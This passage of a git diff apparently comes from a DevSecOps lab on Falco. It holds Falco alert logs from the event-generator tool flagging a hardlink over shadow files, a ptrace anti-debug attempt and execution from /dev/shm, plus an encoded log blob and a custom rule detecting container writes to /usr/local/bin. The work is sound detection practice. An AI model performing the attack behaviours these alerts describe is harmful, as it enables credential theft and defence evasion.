/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link","proc.exepath":"/usr/bin/ln","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:27.706351106Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:74:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.810568831+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787810568831,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-18T10:06:27.810568831Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:75:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:28.016238773+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file=<NA> proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname=<NA> group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1779098788016238773,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-18T10:06:28.016238773Z"}
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:76:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:28.017081243+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file=<NA> proc_cwd=/ proc_pcmdline=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh user_loginname=<NA> group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=sh command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1779098788017081243,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-uqsow4.sh","proc.pname":"sh","proc.tty":0,"user.loginname":"<NA>","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-18T10:06:28.017081243Z"}
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log
new file mode 100644
index 0000000000000000000000000000000000000000..699d2aa8db1be1deaa34e4c1b5ef61279e7c68fc
GIT binary patch
literal 76154
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
A{r~^~

literal 0
HcmV?d00001

diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml
new file mode 100644
index 00000000..fa712f2e
--- /dev/null
+++ b/labs/lab9/falco/rules/custom-rules.yaml
@@ -0,0 +1,8 @@
+# Detect new writable file under /usr/local/bin inside any container
+- rule: Write Binary Under UsrLocalBin
+  desc: Detects writes under /usr/local/bin inside any container
+  condition: evt.type in (open, openat, openat2, creat) and evt.is_open_write=true and fd.name startswith /usr/local/bin/ and container.id != host
+  output: >
+    Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags)
+  priority: WARNING
+  tags: [container, compliance, drift]
diff --git a/labs/submission9.md b/labs/submission9.md
new file mode 100644
index 00000000..699372f0
--- /dev/null
+++ b/labs/submission9.md
